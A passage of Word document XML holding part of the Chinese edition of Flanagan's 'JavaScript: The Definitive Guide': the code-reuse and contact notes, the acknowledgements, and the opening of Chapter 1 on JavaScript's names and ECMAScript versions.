        <w:t>ISBN</w:t>
      </w:r>
      <w:r>
        <w:t>，例如：</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript:The Definitive Guide,by David Flanagan</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>Copyright 2011 Da</w:t>
      </w:r>
      <w:r>
        <w:t>vid Flanagan</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>978-0-596-80552-4"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>的代码重用许可政策的更多规定，可以参阅：</w:t>
      </w:r>
      <w:r>
        <w:t>http://oreilly.com/pub/a/oreilly/ask_tim/2001/codepolicy.htm</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>。如果读者觉得对示例代码的使用超出了上面所给出的许可范围，欢迎通过</w:t>
      </w:r>
      <w:r>
        <w:t>permission@oreilly.com</w:t>
      </w:r>
      <w:r>
        <w:t>联系我们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="Kan_Wu_Biao_Yi_Ji_Ru_He_Lian_Xi_Wo_Men_"/>
      <w:bookmarkStart w:id="15" w:name="Kan_Wu_Biao_Yi_Ji_Ru_He_Lian_Xi_Wo_Men__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>勘误表以及如何联系我们</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>出版社会维护本书的一个勘误表。你可以查阅这个勘误表，同样你也可以将自己发现的问题提交给我们，通过访问本书的网站：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ht</w:t>
      </w:r>
      <w:r>
        <w:t>tp://oreilly.com/catalog/9780596805531</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果你想评论或提问关于本书的技术问题，请用这个邮件和我们联系：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bookquestions@oreilly.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于书籍、研讨会、资源中心以及</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>的官方网址的更多信息，请访问这个地址：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.oreilly.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们在</w:t>
      </w:r>
      <w:r>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:t>上的地址是：</w:t>
      </w:r>
      <w:r>
        <w:t>http://facebook.com/oreilly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们在</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>上的地址是：</w:t>
      </w:r>
      <w:r>
        <w:t>http://twitter.com/oreillymedia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们在</w:t>
      </w:r>
      <w:r>
        <w:t>YouTube</w:t>
      </w:r>
      <w:r>
        <w:t>上的地址是：</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.youtube.com/oreillymedia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="Zhi_Xie_____Zai_Xie_Ben_Shu_De_Guo_Cheng"/>
      <w:bookmarkStart w:id="17" w:name="Zhi_Xie_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>致谢</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在写本书的过程中得到了很多人的热情帮助。感谢本书的编辑</w:t>
      </w:r>
      <w:r>
        <w:t>Mike Loukides</w:t>
      </w:r>
      <w:r>
        <w:t>，他协助我规划了本书，提出的很多建设性的意见。同样感谢本书的技术审校者：</w:t>
      </w:r>
      <w:r>
        <w:t>Zachary Kessin</w:t>
      </w:r>
      <w:r>
        <w:t>，他负责审校了本书第一部分，以及</w:t>
      </w:r>
      <w:r>
        <w:t>Raffaele Cecco</w:t>
      </w:r>
      <w:r>
        <w:t>，他审校了第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章以及第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章的＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞相关的内容。</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>生产部门的工作同样出色。</w:t>
      </w:r>
      <w:r>
        <w:t>Dan Fauxsmith</w:t>
      </w:r>
      <w:r>
        <w:t>作为本书的项目负责人非常尽责，有效的</w:t>
      </w:r>
      <w:r>
        <w:t>保证了本书的进度，</w:t>
      </w:r>
      <w:r>
        <w:t>Teresa Elsey</w:t>
      </w:r>
      <w:r>
        <w:t>的排版工作同样出色，</w:t>
      </w:r>
      <w:r>
        <w:t>Rob Romano</w:t>
      </w:r>
      <w:r>
        <w:t>为本书绘制了很多插图和图表，最后</w:t>
      </w:r>
      <w:r>
        <w:t>Ellen Troutman Zaig</w:t>
      </w:r>
      <w:r>
        <w:t>为本书创建了索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是一个信息时代，本书的所有技术细节都能在互联网上找到渊源，我也和广大网友保持了密切的联系。我在</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>w3c</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>whatwg</w:t>
      </w:r>
      <w:r>
        <w:t>邮件列表中提了很多技术问题，也得到了同仁们很专业的回答，在此我非常感谢他们。同样非常感谢那些在网上分享</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>知识的人们。很抱歉我没办法列出所有人的名字，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>开发者社区非常活跃，将自己投</w:t>
      </w:r>
      <w:r>
        <w:t>身其中让人感觉非常忘我、身心愉悦。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>编辑、审校者以及本书的之前几版的贡献者包括：</w:t>
      </w:r>
      <w:r>
        <w:t>Andrew Schulman</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Angelo Sirigos</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Aristotle Pagaltzis</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Brendan Eich</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Christian Heilmann</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Dan Shafer</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Dave C.Mitchell</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Deb Camer</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Douglas Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Dr.Tankred Hirschmann</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Dylan Schiemann</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Frank Willison</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Geoff Stearns</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Herman </w:t>
      </w:r>
      <w:r>
        <w:t>Venter</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Jay Hodges</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Jeff Yates</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Joseph Kesselman</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Ken Cooper</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Larry Sullivan</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Lynn Rollins</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Neil Berkman</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Nick Thompson</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Norris Boyd</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Paula Ferguson</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Peter-Paul Koch</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Philippe Le Hegaret</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Richard Yaker</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Sanders Kleinfeld</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Scott Furman</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Scott Issacs</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Shon Katzenberger</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Terry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Allen</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Todd Ditchendorf</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Vidur Apparao</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>Waldemar Horwat</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了完成本书，我经常加班到深夜，在此我要感谢我的家人对我的理解和鼓励，我爱他们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para17"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>——David Flanagan(davidflanagan.com),2011</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="Di_1Zhang__JavaScriptGai_Shu_"/>
      <w:bookmarkStart w:id="19" w:name="Di_1Zhang__JavaScriptGai_Shu_____JavaScr"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是面向</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的编程语言。绝大多数现代网站都使用了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>，并且所有的现代</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>基于桌面系统、游戏机、平板电脑和智能手机的浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>均包含了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt</w:t>
      </w:r>
      <w:r>
        <w:t>解释器。这使得</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>能够称得上史上使用最广泛的编程语言。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>也是前端开发工程师必须掌握的三种技能之一：描述网页内容的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>、描述网页样式的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>以及描述网页行为的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>。本书能帮助你掌握</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>这门语言。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果你有其他语言的编程经历，这会有助于你了解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是一门高端的、动态的、弱类型的编程语言，非常适合面向对象和函数式的编程风格。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的语法源自</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>，它的一等函数（</w:t>
      </w:r>
      <w:r>
        <w:t>first-class function</w:t>
      </w:r>
      <w:r>
        <w:t>）来自于</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>cheme</w:t>
      </w:r>
      <w:r>
        <w:t>，它的基于原型（</w:t>
      </w:r>
      <w:r>
        <w:t>prototype-based</w:t>
      </w:r>
      <w:r>
        <w:t>）的继承来自于</w:t>
      </w:r>
      <w:r>
        <w:t>Self</w:t>
      </w:r>
      <w:r>
        <w:t>。但使用本书学习</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>不必去了解那些（</w:t>
      </w:r>
      <w:r>
        <w:t>Java/Scheme/Self</w:t>
      </w:r>
      <w:r>
        <w:t>）语言或熟悉那些术语。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>这个名字经常被误解。除了语法看起来和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>类似之外，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>是完全不同的两种编程语言。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>早已超出了其</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>脚本语言</w:t>
      </w:r>
      <w:r>
        <w:t>”(scripting-language)</w:t>
      </w:r>
      <w:r>
        <w:t>本身的范畴，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>而成为一种集健壮性、高效性和通用性为一身的编程语言。最新的语言版本为严谨的大型软件开发定义了诸多</w:t>
      </w:r>
      <w:r>
        <w:t>新的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>：名字和版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是由</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>发展初期的网景（</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:t>）公司创建，</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Sun Microsystem</w:t>
      </w:r>
      <w:r>
        <w:t>公司（现在的</w:t>
      </w:r>
      <w:r>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r>
        <w:t>）的注册商标，用来特指网景（现在的</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>）对这门语言的实现。网景将这门语言作为标准提交给了</w:t>
      </w:r>
      <w:r>
        <w:t>ECMA——</w:t>
      </w:r>
      <w:r>
        <w:t>欧洲计算机制造协会</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>由于商标上的冲突，这门语言的标准版本改了一个丑陋的名字</w:t>
      </w:r>
      <w:r>
        <w:t>"ECMAScript"</w:t>
      </w:r>
      <w:r>
        <w:t>。同样由于商标的冲突，微软对这门语言的实现版本取了一个广为人知的名字</w:t>
      </w:r>
      <w:r>
        <w:t>"Jscript"</w:t>
      </w:r>
      <w:r>
        <w:t>。实际上，几乎所</w:t>
      </w:r>
      <w:r>
        <w:t>有人都将这门语言叫做</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>。本书也仅仅使用</w:t>
      </w:r>
      <w:r>
        <w:t>"ECMAScript"</w:t>
      </w:r>
      <w:r>
        <w:t>来指代语言标准。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在最近</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>年间，所有的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器都实现了第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>版</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准，我们也已经不必再去考虑版本号了：语言标准已经很稳定了，并且被几乎所有浏览器完整地实现了。最近，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>版定义了新的语言标准，在撰写本书时，浏览器已经开始实现它了。除了</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>长期保留下来的特性，本书还涵盖了所有</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的新特性。正如我们经常将</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>简写成</w:t>
      </w:r>
      <w:r>
        <w:t>JS</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAS</w:t>
      </w:r>
      <w:r>
        <w:t>cript 3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>有时也会简写成</w:t>
      </w:r>
      <w:r>
        <w:t>ES3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当我们提到这门语言本身时，通常所指的语言版本是</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 4</w:t>
      </w:r>
      <w:r>
        <w:t>已经开发了数年，但由于太过庞大，从未发布过正式版本）。有时会看到</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的版本号（比如</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.5</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.8</w:t>
      </w:r>
      <w:r>
        <w:t>）。这些是</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>的版本号：版本</w:t>
      </w:r>
      <w:r>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:t>基本上就是</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>，后续版本包含了非标准的语言扩展（参照第</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>章）。最后，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器或</w:t>
      </w:r>
      <w:r>
        <w:t>者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>引擎</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:t>）也有版本号，比如，</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>将它的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器叫做</w:t>
      </w:r>
      <w:r>
        <w:t>V8</w:t>
      </w:r>
      <w:r>
        <w:t>，在撰写本书时</w:t>
      </w:r>
      <w:r>
        <w:t>V8</w:t>
      </w:r>
      <w:r>
        <w:t>引擎最新版本是</w:t>
      </w:r>
      <w:r>
        <w:t>3.0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了有用起见，通常每一种编程语言都有各自的开发平台、标准库或</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>函数，用来提供诸如基本输入输出的功能。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心针对文本、数组、日期和正则表达式的操作定义了很少的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，但是这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>不包括输入输出功能。输入和输出功能（类似网络、存储和图形相关的复杂特性）是由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>所属的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
